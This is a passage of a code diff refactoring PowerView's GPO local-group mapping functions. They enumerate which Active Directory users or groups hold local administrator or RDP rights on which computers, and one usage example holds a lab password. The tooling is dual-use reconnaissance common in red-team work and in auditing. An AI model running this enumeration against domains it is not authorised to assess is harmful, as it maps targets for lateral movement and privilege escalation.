+.LINK
+
+http://www.harmj0y.net/blog/redteaming/where-my-admins-at-gpo-edition/
 #>
 
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('PowerView.GPOUserLocalGroupMapping')]
     [CmdletBinding()]
-    Param (
+    Param(
+        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('DistinguishedName', 'SamAccountName', 'Name')]
         [String]
-        $UserName,
+        $Identity,
 
         [String]
-        $GroupName,
+        [ValidateSet('Administrators', 'S-1-5-32-544', 'RDP', 'Remote Desktop Users', 'S-1-5-32-555')]
+        $LocalGroup = 'Administrators',
 
+        [ValidateNotNullOrEmpty()]
         [String]
         $Domain,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('ADSPath')]
         [String]
-        $DomainController,
+        $SearchBase,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('DomainController')]
         [String]
-        $LocalGroup = 'Administrators',
-        
-        [Switch]
-        $UsePSDrive,
-
-        [ValidateRange(1,10000)] 
-        [Int]
-        $PageSize = 200
-    )
-
-    if($UserName) {
-        # if a group name is specified, get that user object so we can extract the target SID
-        $User = Get-NetUser -UserName $UserName -Domain $Domain -DomainController $DomainController -PageSize $PageSize | Select-Object -First 1
-        $UserSid = $User.objectsid
-
-        if(-not $UserSid) {    
-            Throw "User '$UserName' not found!"
-        }
-
-        $TargetSIDs = @($UserSid)
-        $ObjectSamAccountName = $User.samaccountname
-        $TargetObject = $UserSid
-    }
-    elseif($GroupName) {
-        # if a group name is specified, get that group object so we can extract the target SID
-        $Group = Get-NetGroup -GroupName $GroupName -Domain $Domain -DomainController $DomainController -FullData -PageSize $PageSize | Select-Object -First 1
-        $GroupSid = $Group.objectsid
-
-        if(-not $GroupSid) {    
-            Throw "Group '$GroupName' not found!"
-        }
+        $Server,
 
-        $TargetSIDs = @($GroupSid)
-        $ObjectSamAccountName = $Group.samaccountname
-        $TargetObject = $GroupSid
-    }
-    else {
-        $TargetSIDs = @('*')
-    }
+        [ValidateSet('Base', 'OneLevel', 'Subtree')]
+        [String]
+        $SearchScope = 'Subtree',
 
-    # figure out what the SID is of the target local group we're checking for membership in
-    if($LocalGroup -like "*Admin*") {
-        $TargetLocalSID = 'S-1-5-32-544'
-    }
-    elseif ( ($LocalGroup -like "*RDP*") -or ($LocalGroup -like "*Remote*") ) {
-        $TargetLocalSID = 'S-1-5-32-555'
-    }
-    elseif ($LocalGroup -like "S-1-5-*") {
-        $TargetLocalSID = $LocalGroup
-    }
-    else {
-        throw "LocalGroup must be 'Administrators', 'RDP', or a 'S-1-5-X' SID format."
-    }
+        [ValidateRange(1, 10000)]
+        [Int]
+        $ResultPageSize = 200,
 
-    # if we're not listing all relationships, use the tokenGroups approach from Get-NetGroup to 
-    # get all effective security SIDs this object is a part of
-    if($TargetSIDs[0] -and ($TargetSIDs[0] -ne '*')) {
-        $TargetSIDs += Get-NetGroup -Domain $Domain -DomainController $DomainController -PageSize $PageSize -UserName $ObjectSamAccountName -RawSids
-    }
+        [ValidateRange(1, 10000)]
+        [Int]
+        $ServerTimeLimit,
 
-    if(-not $TargetSIDs) {
-        throw "No effective target SIDs!"
-    }
+        [Switch]
+        $Tombstone,
 
-    Write-Verbose "TargetLocalSID: $TargetLocalSID"
-    Write-Verbose "Effective target SIDs: $TargetSIDs"
+        [Management.Automation.PSCredential]
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
+    )
 
-    $GPOGroupArgs =  @{
-        'Domain' = $Domain
-        'DomainController' = $DomainController
-        'UsePSDrive' = $UsePSDrive
-        'ResolveMemberSIDs' = $True
-        'PageSize' = $PageSize
+    BEGIN {
+        $CommonArguments = @{}
+        if ($PSBoundParameters['Domain']) { $CommonArguments['Domain'] = $Domain }
+        if ($PSBoundParameters['Server']) { $CommonArguments['Server'] = $Server }
+        if ($PSBoundParameters['SearchScope']) { $CommonArguments['SearchScope'] = $SearchScope }
+        if ($PSBoundParameters['ResultPageSize']) { $CommonArguments['ResultPageSize'] = $ResultPageSize }
+        if ($PSBoundParameters['ServerTimeLimit']) { $CommonArguments['ServerTimeLimit'] = $ServerTimeLimit }
+        if ($PSBoundParameters['Tombstone']) { $CommonArguments['Tombstone'] = $Tombstone }
+        if ($PSBoundParameters['Credential']) { $CommonArguments['Credential'] = $Credential }
     }
 
-    # enumerate all GPO group mappings for the target domain that involve our target SID set
-    $GPOgroups = Get-NetGPOGroup @GPOGroupArgs | ForEach-Object {
-
-        $GPOgroup = $_
+    PROCESS {
+        $TargetSIDs = @()
 
-        # if the locally set group is what we're looking for, check the GroupMembers ('members')
-        #    for our target SID
-        if($GPOgroup.GroupSID -match $TargetLocalSID) {
-            $GPOgroup.GroupMembers | Where-Object {$_} | ForEach-Object {
-                if ( ($TargetSIDs[0] -eq '*') -or ($TargetSIDs -Contains $_) ) {
-                    $GPOgroup
-                }
+        if ($PSBoundParameters['Identity']) {
+            $TargetSIDs += Get-DomainObject @CommonArguments -Identity $Identity | Select-Object -Expand objectsid
+            $TargetObjectSID = $TargetSIDs
+            if (-not $TargetSIDs) {
+                Throw "[Get-DomainGPOUserLocalGroupMapping] Unable to retrieve SID for identity '$Identity'"
             }
         }
-        # if the group is a 'memberof' the group we're looking for, check GroupSID against the targt SIDs 
-        if( ($GPOgroup.GroupMemberOf -contains $TargetLocalSID) ) {
-            if( ($TargetSIDs[0] -eq '*') -or ($TargetSIDs -Contains $GPOgroup.GroupSID) ) {
-                $GPOgroup
-            }
+        else {
+            # no filtering/match all
+            $TargetSIDs = @('*')
         }
-    } | Sort-Object -Property GPOName -Unique
-
-    $GPOgroups | ForEach-Object {
 
-        $GPOname = $_.GPODisplayName
-        $GPOguid = $_.GPOName
-        $GPOPath = $_.GPOPath
-        $GPOType = $_.GPOType
-        if($_.GroupMembers) {
-            $GPOMembers = $_.GroupMembers
+        if ($LocalGroup -match 'S-1-5') {
+            $TargetLocalSID = $LocalGroup
+        }
+        elseif ($LocalGroup -match 'Admin') {
+            $TargetLocalSID = 'S-1-5-32-544'
         }
         else {
-            $GPOMembers = $_.GroupSID
+            # RDP
+            $TargetLocalSID = 'S-1-5-32-555'
         }
-        
-        $Filters = $_.Filters
 
-        if(-not $TargetObject) {
-            # if the * wildcard was used, set the ObjectDistName as the GPO member SID set
-            #   so all relationship mappings are output
-            $TargetObjectSIDs = $GPOMembers
-        }
-        else {
-            $TargetObjectSIDs = $TargetObject
+        if ($TargetSIDs[0] -ne '*') {
+            ForEach ($TargetSid in $TargetSids) {
+                Write-Verbose "[Get-DomainGPOUserLocalGroupMapping] Enumerating nested group memberships for: '$TargetSid'"
+                $TargetSIDs += Get-DomainGroup @CommonArguments -Properties 'objectsid' -MemberIdentity $TargetSid | Select-Object -ExpandProperty objectsid
+            }
         }
 
-        # find any OUs that have this GUID applied and then retrieve any computers from the OU
-        Get-NetOU -Domain $Domain -DomainController $DomainController -GUID $GPOguid -FullData -PageSize $PageSize | ForEach-Object {
-            if($Filters) {
-                # filter for computer name/org unit if a filter is specified
-                #   TODO: handle other filters (i.e. OU filters?) again, I hate you GPP...
-                $OUComputers = Get-NetComputer -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $_.ADSpath -FullData -PageSize $PageSize | Where-Object {
-                    $_.adspath -match ($Filters.Value)
-                } | ForEach-Object { $_.dnshostname }
+        Write-Verbose "[Get-DomainGPOUserLocalGroupMapping] Target localgroup SID: $TargetLocalSID"
+        Write-Verbose "[Get-DomainGPOUserLocalGroupMapping] Effective target domain SIDs: $TargetSIDs"
+
+        $GPOgroups = Get-DomainGPOLocalGroup @CommonArguments -ResolveMembersToSIDs | ForEach-Object {
+            $GPOgroup = $_
+            # if the locally set group is what we're looking for, check the GroupMembers ('members') for our target SID
+            if ($GPOgroup.GroupSID -match $TargetLocalSID) {
+                $GPOgroup.GroupMembers | Where-Object {$_} | ForEach-Object {
+                    if ( ($TargetSIDs[0] -eq '*') -or ($TargetSIDs -Contains $_) ) {
+                        $GPOgroup
+                    }
+                }
+            }
+            # if the group is a 'memberof' the group we're looking for, check GroupSID against the targt SIDs
+            if ( ($GPOgroup.GroupMemberOf -contains $TargetLocalSID) ) {
+                if ( ($TargetSIDs[0] -eq '*') -or ($TargetSIDs -Contains $GPOgroup.GroupSID) ) {
+                    $GPOgroup
+                }
+            }
+        } | Sort-Object -Property GPOName -Unique
+
+        $GPOgroups | Where-Object {$_} | ForEach-Object {
+            $GPOname = $_.GPODisplayName
+            $GPOguid = $_.GPOName
+            $GPOPath = $_.GPOPath
+            $GPOType = $_.GPOType
+            if ($_.GroupMembers) {
+                $GPOMembers = $_.GroupMembers
             }
             else {
-                $OUComputers = Get-NetComputer -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $_.ADSpath -PageSize $PageSize
+                $GPOMembers = $_.GroupSID
             }
 
-            if($OUComputers) {
-                if($OUComputers -isnot [System.Array]) {$OUComputers = @($OUComputers)}
+            $Filters = $_.Filters
 
-                ForEach ($TargetSid in $TargetObjectSIDs) {
-                    $Object = Get-ADObject -SID $TargetSid -Domain $Domain -DomainController $DomainController -Credential $Credential -PageSize $PageSize
+            if ($TargetSIDs[0] -eq '*') {
+                # if the * wildcard was used, set the targets to all GPO members so everything it output
+                $TargetObjectSIDs = $GPOMembers
+            }
+            else {
+                $TargetObjectSIDs = $TargetObjectSID
+            }
 
-                    $IsGroup = @('268435456','268435457','536870912','536870913') -contains $Object.samaccounttype
+            # find any OUs that have this GPO linked through gpLink
+            Get-DomainOU @CommonArguments -Raw -Properties 'name,distinguishedname' -GPLink $GPOGuid | ForEach-Object {
+                if ($Filters) {
+                    $OUComputers = Get-DomainComputer @CommonArguments -Properties 'dnshostname,distinguishedname' -SearchBase $_.Path | Where-Object {$_.distinguishedname -match ($Filters.Value)} | Select-Object -ExpandProperty dnshostname
+                }
+                else {
+                    $OUComputers = Get-DomainComputer @CommonArguments -Properties 'dnshostname' -SearchBase $_.Path | Select-Object -ExpandProperty dnshostname
+                }
 
-                    $GPOLocation = New-Object PSObject
-                    $GPOLocation | Add-Member Noteproperty 'ObjectName' $Object.samaccountname
-                    $GPOLocation | Add-Member Noteproperty 'ObjectDN' $Object.distinguishedname
-                    $GPOLocation | Add-Member Noteproperty 'ObjectSID' $Object.objectsid
-                    $GPOLocation | Add-Member Noteproperty 'Domain' $Domain
-                    $GPOLocation | Add-Member Noteproperty 'IsGroup' $IsGroup
-                    $GPOLocation | Add-Member Noteproperty 'GPODisplayName' $GPOname
-                    $GPOLocation | Add-Member Noteproperty 'GPOGuid' $GPOGuid
-                    $GPOLocation | Add-Member Noteproperty 'GPOPath' $GPOPath
-                    $GPOLocation | Add-Member Noteproperty 'GPOType' $GPOType
-                    $GPOLocation | Add-Member Noteproperty 'ContainerName' $_.distinguishedname
-                    $GPOLocation | Add-Member Noteproperty 'ComputerName' $OUComputers
-                    $GPOLocation.PSObject.TypeNames.Add('PowerView.GPOLocalGroup')
-                    $GPOLocation
+                if ($OUComputers) {
+                    if ($OUComputers -isnot [System.Array]) {$OUComputers = @($OUComputers)}
+
+                    ForEach ($TargetSid in $TargetObjectSIDs) {
+                        $Object = Get-DomainObject @CommonArguments -Identity $TargetSid -Properties 'samaccounttype,samaccountname,distinguishedname,objectsid'
+
+                        $IsGroup = @('268435456','268435457','536870912','536870913') -contains $Object.samaccounttype
+
+                        $GPOLocalGroupMapping = New-Object PSObject
+                        $GPOLocalGroupMapping | Add-Member Noteproperty 'ObjectName' $Object.samaccountname
+                        $GPOLocalGroupMapping | Add-Member Noteproperty 'ObjectDN' $Object.distinguishedname
+                        $GPOLocalGroupMapping | Add-Member Noteproperty 'ObjectSID' $Object.objectsid
+                        $GPOLocalGroupMapping | Add-Member Noteproperty 'Domain' $Domain
+                        $GPOLocalGroupMapping | Add-Member Noteproperty 'IsGroup' $IsGroup
+                        $GPOLocalGroupMapping | Add-Member Noteproperty 'GPODisplayName' $GPOname
+                        $GPOLocalGroupMapping | Add-Member Noteproperty 'GPOGuid' $GPOGuid
+                        $GPOLocalGroupMapping | Add-Member Noteproperty 'GPOPath' $GPOPath
+                        $GPOLocalGroupMapping | Add-Member Noteproperty 'GPOType' $GPOType
+                        $GPOLocalGroupMapping | Add-Member Noteproperty 'ContainerName' $_.Properties.distinguishedname
+                        $GPOLocalGroupMapping | Add-Member Noteproperty 'ComputerName' $OUComputers
+                        $GPOLocalGroupMapping.PSObject.TypeNames.Insert(0, 'PowerView.GPOLocalGroupMapping')
+                        $GPOLocalGroupMapping
+                    }
                 }
             }
-        }
 
-        # find any sites that have this GUID applied
-        Get-NetSite -Domain $Domain -DomainController $DomainController -GUID $GPOguid -PageSize $PageSize -FullData | ForEach-Object {
-
-            ForEach ($TargetSid in $TargetObjectSIDs) {
-                $Object = Get-ADObject -SID $TargetSid -Domain $Domain -DomainController $DomainController -Credential $Credential -PageSize $PageSize
+            # find any sites that have this GPO linked through gpLink
+            Get-DomainSite @CommonArguments -Properties 'siteobjectbl,distinguishedname' -GPLink $GPOGuid | ForEach-Object {
+                ForEach ($TargetSid in $TargetObjectSIDs) {
+                    $Object = Get-DomainObject @CommonArguments -Identity $TargetSid -Properties 'samaccounttype,samaccountname,distinguishedname,objectsid'
 
-                $IsGroup = @('268435456','268435457','536870912','536870913') -contains $Object.samaccounttype
+                    $IsGroup = @('268435456','268435457','536870912','536870913') -contains $Object.samaccounttype
 
-                $AppliedSite = New-Object PSObject
-                $AppliedSite | Add-Member Noteproperty 'ObjectName' $Object.samaccountname
-                $AppliedSite | Add-Member Noteproperty 'ObjectDN' $Object.distinguishedname
-                $AppliedSite | Add-Member Noteproperty 'ObjectSID' $Object.objectsid
-                $AppliedSite | Add-Member Noteproperty 'IsGroup' $IsGroup
-                $AppliedSite | Add-Member Noteproperty 'Domain' $Domain
-                $AppliedSite | Add-Member Noteproperty 'GPODisplayName' $GPOname
-                $AppliedSite | Add-Member Noteproperty 'GPOGuid' $GPOGuid
-                $AppliedSite | Add-Member Noteproperty 'GPOPath' $GPOPath
-                $AppliedSite | Add-Member Noteproperty 'GPOType' $GPOType
-                $AppliedSite | Add-Member Noteproperty 'ContainerName' $_.distinguishedname
-                $AppliedSite | Add-Member Noteproperty 'ComputerName' $_.siteobjectbl
-                $AppliedSite.PSObject.TypeNames.Add('PowerView.GPOLocalGroup')
-                $AppliedSite
+                    $GPOLocalGroupMapping = New-Object PSObject
+                    $GPOLocalGroupMapping | Add-Member Noteproperty 'ObjectName' $Object.samaccountname
+                    $GPOLocalGroupMapping | Add-Member Noteproperty 'ObjectDN' $Object.distinguishedname
+                    $GPOLocalGroupMapping | Add-Member Noteproperty 'ObjectSID' $Object.objectsid
+                    $GPOLocalGroupMapping | Add-Member Noteproperty 'IsGroup' $IsGroup
+                    $GPOLocalGroupMapping | Add-Member Noteproperty 'Domain' $Domain
+                    $GPOLocalGroupMapping | Add-Member Noteproperty 'GPODisplayName' $GPOname
+                    $GPOLocalGroupMapping | Add-Member Noteproperty 'GPOGuid' $GPOGuid
+                    $GPOLocalGroupMapping | Add-Member Noteproperty 'GPOPath' $GPOPath
+                    $GPOLocalGroupMapping | Add-Member Noteproperty 'GPOType' $GPOType
+                    $GPOLocalGroupMapping | Add-Member Noteproperty 'ContainerName' $_.distinguishedname
+                    $GPOLocalGroupMapping | Add-Member Noteproperty 'ComputerName' $_.siteobjectbl
+                    $GPOLocalGroupMapping.PSObject.TypeNames.Add('PowerView.GPOLocalGroupMapping')
+                    $GPOLocalGroupMapping
+                }
             }
         }
     }
 }
 
 
-function Find-GPOComputerAdmin {
+function Get-DomainGPOComputerLocalGroupMapping {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+Takes a computer (or GPO) object and determines what users/groups are in the specified
+local group for the machine through GPO correlation.
+
+Author: @harmj0y  
+License: BSD 3-Clause  
+Required Dependencies: Get-DomainComputer, Get-DomainOU, Get-NetComputerSiteName, Get-DomainSite, Get-DomainGPOLocalGroup  
+
+.DESCRIPTION
+
+This function is the inverse of Get-DomainGPOUserLocalGroupMapping, and finds what users/groups
+are in the specified local group for a target machine through GPO correlation.
 
-        Takes a computer (or GPO) object and determines what users/groups are in the specified
-        local group for the machine.
+If a -ComputerIdentity is specified, retrieve the complete computer object, attempt to
+determine the OU the computer is a part of. Then resolve the computer's site name with
+Get-NetComputerSiteName and retrieve all sites object Get-DomainSite. For those results, attempt to
+enumerate all linked GPOs and associated local group settings with Get-DomainGPOLocalGroup. For
+each resulting GPO group, resolve the resulting user/group name to a full AD object and
+return the results. This will return the domain objects that are members of the specified
+-LocalGroup for the given computer.
 
-        Author: @harmj0y
-        License: BSD 3-Clause
-        Required Dependencies: Get-NetComputer, Get-SiteName, Get-NetSite, Get-NetGPOGroup, Get-ADObject, Get-NetGroupMember, Convert-SidToName
-        Optional Dependencies: None
+Otherwise, if -OUIdentity is supplied, the same process is executed to find linked GPOs and
+localgroup specifications.
 
-    .DESCRIPTION
-        
-        If a -ComputerName is specified, retrieve the complete computer object, attempt to
-        determine the OU the computer is a part of. Then resolve the computer's site name with
-        Get-SiteName and retrieve all sites object Get-NetSite. For those results, attempt to
-        enumerate all linked GPOs and associated local group settings with Get-NetGPOGroup. For
-        each resulting GPO group, resolve the resulting user/group name to a full AD object and
-        return the results. This will return the domain objects that are members of the specified
-        -LocalGroup for the given computer.
+.PARAMETER ComputerIdentity
 
-        Inverse of Find-GPOLocation.
+A SamAccountName (e.g. WINDOWS10$), DistinguishedName (e.g. CN=WINDOWS10,CN=Computers,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1124), GUID (e.g. 4f16b6bc-7010-4cbf-b628-f3cfe20f6994),
+or a dns host name (e.g. windows10.testlab.local) for the computer to identity GPO local group mappings for.
 
-    .PARAMETER ComputerName
+.PARAMETER OUIdentity
 
-        The computer to determine local administrative access to.
+An OU name (e.g. TestOU), DistinguishedName (e.g. OU=TestOU,DC=testlab,DC=local), or
+GUID (e.g. 8a9ba22a-8977-47e6-84ce-8c26af4e1e6a) for the OU to identity GPO local group mappings for.
 
-    .PARAMETER OUName
+.PARAMETER LocalGroup
 
-        OU name to determine who has local adminisrtative acess to computers
-        within it. 
+The local group to check access against.
+Can be "Administrators" (S-1-5-32-544), "RDP/Remote Desktop Users" (S-1-5-32-555),
+or a custom local SID. Defaults to local 'Administrators'.
 
-    .PARAMETER Domain
+.PARAMETER Domain
 
-        Optional domain the computer/OU exists in, defaults to the current domain.
+Specifies the domain to enumerate GPOs for, defaults to the current domain.
 
-    .PARAMETER DomainController
+.PARAMETER Server
 
-        Domain controller to reflect LDAP queries through.
+Specifies an Active Directory server (domain controller) to bind to.
 
-    .PARAMETER Recurse
+.PARAMETER SearchScope
 
-        Switch. If a returned member is a group, recurse and get all members.
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
 
-    .PARAMETER LocalGroup
+.PARAMETER ResultPageSize
 
-        The local group to check access against.
-        Can be "Administrators" (S-1-5-32-544), "RDP/Remote Desktop Users" (S-1-5-32-555),
-        or a custom local SID.
-        Defaults to local 'Administrators'.
+Specifies the PageSize to set for the LDAP searcher object.
 
-    .PARAMETER UsePSDrive
+.PARAMETER ServerTimeLimit
 
-        Switch. Mount any found policy files with temporary PSDrives.
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
 
-    .PARAMETER PageSize
+.PARAMETER Tombstone
 
-        The PageSize to set for the LDAP searcher object.
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
 
-    .EXAMPLE
+.PARAMETER Credential
 
-        PS C:\> Find-GPOComputerAdmin -ComputerName WINDOWS3.dev.testlab.local
-        
-        Finds users who have local admin rights over WINDOWS3 through GPO correlation.
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
 
-    .EXAMPLE
+.EXAMPLE
 
-        PS C:\> Find-GPOComputerAdmin -ComputerName WINDOWS3.dev.testlab.local -LocalGroup RDP
-        
-        Finds users who have RDP rights over WINDOWS3 through GPO correlation.
+Get-DomainGPOComputerLocalGroupMapping -ComputerName WINDOWS3.testlab.local
+
+Finds users who have local admin rights over WINDOWS3 through GPO correlation.
+
+.EXAMPLE
+
+Get-DomainGPOComputerLocalGroupMapping -Domain dev.testlab.local -ComputerName WINDOWS4.dev.testlab.local -LocalGroup RDP
+
+Finds users who have RDP rights over WINDOWS4 through GPO correlation.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainGPOComputerLocalGroupMapping -Credential $Cred -ComputerIdentity SQL.testlab.local
+
+.OUTPUTS
+
+PowerView.GGPOComputerLocalGroupMember
 #>
 
-    [CmdletBinding()]
-    Param (
-        [Parameter(ValueFromPipeline=$True)]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('PowerView.GGPOComputerLocalGroupMember')]
+    [CmdletBinding(DefaultParameterSetName = 'ComputerIdentity')]
+    Param(
+        [Parameter(Position = 0, ParameterSetName = 'ComputerIdentity', Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('ComputerName', 'Computer', 'DistinguishedName', 'SamAccountName', 'Name')]
         [String]
-        $ComputerName,
+        $ComputerIdentity,
+
+        [Parameter(Mandatory = $True, ParameterSetName = 'OUIdentity')]
+        [Alias('OU')]
+        [String]
+        $OUIdentity,
 
         [String]
-        $OUName,
+        [ValidateSet('Administrators', 'S-1-5-32-544', 'RDP', 'Remote Desktop Users', 'S-1-5-32-555')]
+        $LocalGroup = 'Administrators',
 
+        [ValidateNotNullOrEmpty()]
         [String]
         $Domain,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('ADSPath')]
         [String]
-        $DomainController,
+        $SearchBase,
 
-        [Switch]
-        $Recurse,
+        [ValidateNotNullOrEmpty()]
+        [Alias('DomainController')]
+        [String]
+        $Server,
 
+        [ValidateSet('Base', 'OneLevel', 'Subtree')]
         [String]
-        $LocalGroup = 'Administrators',
+        $SearchScope = 'Subtree',
 
-        [Switch]
-        $UsePSDrive,
+        [ValidateRange(1, 10000)]
+        [Int]
+        $ResultPageSize = 200,
 
-        [ValidateRange(1,10000)] 
+        [ValidateRange(1, 10000)]
         [Int]
-        $PageSize = 200
-    )
+        $ServerTimeLimit,
 
-    process {
-    
-        if(!$ComputerName -and !$OUName) {
-            Throw "-ComputerName or -OUName must be provided"
-        }
+        [Switch]
+        $Tombstone,
 
-        $GPOGroups = @()
+        [Management.Automation.PSCredential]
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
+    )
+
+    BEGIN {
+        $CommonArguments = @{}
+        if ($PSBoundParameters['Domain']) { $CommonArguments['Domain'] = $Domain }
+        if ($PSBoundParameters['Server']) { $CommonArguments['Server'] = $Server }
+        if ($PSBoundParameters['SearchScope']) { $CommonArguments['SearchScope'] = $SearchScope }
+        if ($PSBoundParameters['ResultPageSize']) { $CommonArguments['ResultPageSize'] = $ResultPageSize }
+        if ($PSBoundParameters['ServerTimeLimit']) { $CommonArguments['ServerTimeLimit'] = $ServerTimeLimit }
+        if ($PSBoundParameters['Tombstone']) { $CommonArguments['Tombstone'] = $Tombstone }
+        if ($PSBoundParameters['Credential']) { $CommonArguments['Credential'] = $Credential }
+    }
 
-        if($ComputerName) {
-            $Computers = Get-NetComputer -ComputerName $ComputerName -Domain $Domain -DomainController $DomainController -FullData -PageSize $PageSize
+    PROCESS {
+        if ($PSBoundParameters['ComputerIdentity']) {
+            $Computers = Get-DomainComputer @CommonArguments -Identity $ComputerIdentity -Properties 'distinguishedname,dnshostname'
 
-            if(!$Computers) {
-                throw "Computer $ComputerName in domain '$Domain' not found! Try a fully qualified host name"
+            if (-not $Computers) {
+                throw "[Get-DomainGPOComputerLocalGroupMapping] Computer $ComputerIdentity not found. Try a fully qualified host name."
             }
-            
-            $TargetOUs = @()
-            ForEach($Computer in $Computers) {
-                # extract all OUs a computer is a part of
-                $DN = $Computer.distinguishedname
 
-                $TargetOUs += $DN.split(",") | ForEach-Object {
-                    if($_.startswith("OU=")) {
-                        $DN.substring($DN.indexof($_))
+            ForEach ($Computer in $Computers) {
+
+                $GPOGuids = @()
+
+                # extract any GPOs linked to this computer's OU through gpLink
+                $DN = $Computer.distinguishedname
+                $OUIndex = $DN.IndexOf('OU=')
+                if ($OUIndex -gt 0) {
+                    $OUName = $DN.SubString($OUIndex)
+                }
+                if ($OUName) {
+                    $GPOGuids += Get-DomainOU @CommonArguments -SearchBase $OUName -LDAPFilter '(gplink=*)' | ForEach-Object {
+                        Select-String -InputObject $_.gplink -Pattern '(\{){0,1}[0-9a-fA-F]{8}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{12}(\}){0,1}' -AllMatches | ForEach-Object {$_.Matches | Select-Object -ExpandProperty Value }
                     }
                 }
-            }
 
-            # enumerate any linked GPOs for the computer's site
-            $ComputerSite = (Get-SiteName -ComputerName $ComputerName).SiteName
-            if($ComputerSite -and ($ComputerSite -notlike 'Error*')) {
-                $GPOGroups += Get-NetSite -SiteName $ComputerSite -FullData | ForEach-Object {
-                    if($_.gplink) {
-                        $_.gplink.split("][") | ForEach-Object {
-                            if ($_.startswith("LDAP")) {
-                                $_.split(";")[0]
-                            }
-                        }
+                # extract any GPOs linked to this computer's site through gpLink
+                Write-Verbose "Enumerating the sitename for: $($Computer.dnshostname)"
+                $ComputerSite = (Get-NetComputerSiteName -ComputerName $Computer.dnshostname).SiteName
+                if ($ComputerSite -and ($ComputerSite -notmatch 'Error')) {
+                    $GPOGuids += Get-DomainSite @CommonArguments -Identity $ComputerSite -LDAPFilter '(gplink=*)' | ForEach-Object {
+                        Select-String -InputObject $_.gplink -Pattern '(\{){0,1}[0-9a-fA-F]{8}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{12}(\}){0,1}' -AllMatches | ForEach-Object {$_.Matches | Select-Object -ExpandProperty Value }
                     }
-                } | ForEach-Object {
-                    $GPOGroupArgs =  @{
-                        'Domain' = $Domain
-                        'DomainController' = $DomainController
-                        'ResolveMemberSIDs' = $True
-                        'UsePSDrive' = $UsePSDrive
-                        'PageSize' = $PageSize
-                    }
-
-                    # for each GPO link, get any locally set user/group SIDs
-                    Get-NetGPOGroup @GPOGroupArgs
                 }
-            }
-        }
-        else {
-            $TargetOUs = @($OUName)
-        }
-
-        Write-Verbose "Target OUs: $TargetOUs"
 
-        $TargetOUs | Where-Object {$_} | ForEach-Object {
+                # process any GPO local group settings from the GPO GUID set
+                $GPOGuids | Get-DomainGPOLocalGroup @CommonArguments | Sort-Object -Property GPOName -Unique | ForEach-Object {
+                    $GPOGroup = $_
 
-            $GPOLinks = Get-NetOU -Domain $Domain -DomainController $DomainController -ADSpath $_ -FullData -PageSize $PageSize | ForEach-Object { 
-                # and then get any GPO links
-                if($_.gplink) {
-                    $_.gplink.split("][") | ForEach-Object {
-                        if ($_.startswith("LDAP")) {
-                            $_.split(";")[0]
-                        }
+                    if($GPOGroup.GroupMembers) {
+                        $GPOMembers = $GPOGroup.GroupMembers
+                    }
+                    else {
+                        $GPOMembers = $GPOGroup.GroupSID
                     }
-                }
-            }
-
-            $GPOGroupArgs =  @{
-                'Domain' = $Domain
-                'DomainController' = $DomainController
-                'UsePSDrive' = $UsePSDrive
-                'ResolveMemberSIDs' = $True
-                'PageSize' = $PageSize
-            }
 
-            # extract GPO groups that are set through any gPlink for this OU
-            $GPOGroups += Get-NetGPOGroup @GPOGroupArgs | ForEach-Object {
-                ForEach($GPOLink in $GPOLinks) {
-                    $Name = $_.GPOName
-                    if($GPOLink -like "*$Name*") {
-                        $_
+                    $GPOMembers | ForEach-Object {
+                        $Object = Get-DomainObject @CommonArguments -Identity $_
+                        $IsGroup = @('268435456','268435457','536870912','536870913') -contains $Object.samaccounttype
+
+                        $GPOComputerLocalGroupMember = New-Object PSObject
+                        $GPOComputerLocalGroupMember | Add-Member Noteproperty 'ComputerName' $Computer.dnshostname
+                        $GPOComputerLocalGroupMember | Add-Member Noteproperty 'ObjectName' $Object.samaccountname
+                        $GPOComputerLocalGroupMember | Add-Member Noteproperty 'ObjectDN' $Object.distinguishedname
+                        $GPOComputerLocalGroupMember | Add-Member Noteproperty 'ObjectSID' $_
+                        $GPOComputerLocalGroupMember | Add-Member Noteproperty 'IsGroup' $IsGroup
+                        $GPOComputerLocalGroupMember | Add-Member Noteproperty 'GPODisplayName' $GPOGroup.GPODisplayName
+                        $GPOComputerLocalGroupMember | Add-Member Noteproperty 'GPOGuid' $GPOGroup.GPOName
+                        $GPOComputerLocalGroupMember | Add-Member Noteproperty 'GPOPath' $GPOGroup.GPOPath
+                        $GPOComputerLocalGroupMember | Add-Member Noteproperty 'GPOType' $GPOGroup.GPOType
+                        $GPOComputerLocalGroupMember.PSObject.TypeNames.Add('PowerView.GPOComputerLocalGroupMember')
+                        $GPOComputerLocalGroupMember
                     }
                 }
             }
         }
+    }
+}
 
-        # for each found GPO group, resolve the SIDs of the members
-        $GPOgroups | Sort-Object -Property GPOName -Unique | ForEach-Object {
-            $GPOGroup = $_
 
-            if($GPOGroup.GroupMembers) {
-                $GPOMembers = $GPOGroup.GroupMembers
-            }
-            else {
-                $GPOMembers = $GPOGroup.GroupSID
-            }
+function Get-DomainPolicy {
+<#
+.SYNOPSIS
 
-            $GPOMembers | ForEach-Object {
-                # resolve this SID to a domain object
